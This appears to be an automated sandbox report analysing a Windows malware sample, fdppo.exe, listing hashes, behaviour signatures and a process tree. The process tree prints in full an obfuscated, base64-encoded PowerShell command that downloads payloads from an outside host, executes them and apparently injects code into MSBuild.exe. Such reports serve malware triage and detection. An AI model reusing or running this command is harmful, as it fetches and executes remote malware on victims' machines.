Analysis

  • max time kernel: 143s
  • max time network: 144s
  • platform: windows10_x64
  • resource: win10
  • submitted: 13-07-2020 14:36

General

  • Target: fdppo.exe
  • Size: 101KB
  • MD5: 082348ffb2977a0762e3e5d6f4a47ff4
  • SHA1: a63f12bba792fd01307373a7565b96549eb9f3c8
  • SHA256: 8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c
  • SHA512: ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c

Score
3/10

Malware Config

Signatures

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdppo.exe
    "C:\Users\Admin\AppData\Local\Temp\fdppo.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
      2⤵
        PID:2968
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 696
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          • Program crash
          PID:2840

    Network

    MITRE ATT&CK Matrix

    Downloads

    • memory/2840-1-0x0000000004080000-0x0000000004081000-memory.dmp (Filesize: 4KB)
    • memory/2840-7-0x0000000004830000-0x0000000004831000-memory.dmp (Filesize: 4KB)
    • memory/2968-0-0x0000000000000000-mapping.dmp
    • memory/2968-2-0x0000000000000000-mapping.dmp
    • memory/2968-3-0x0000000000000000-mapping.dmp
    • memory/2968-4-0x0000000000000000-mapping.dmp
    • memory/2968-5-0x0000000000000000-mapping.dmp
    • memory/2968-6-0x0000000000000000-mapping.dmp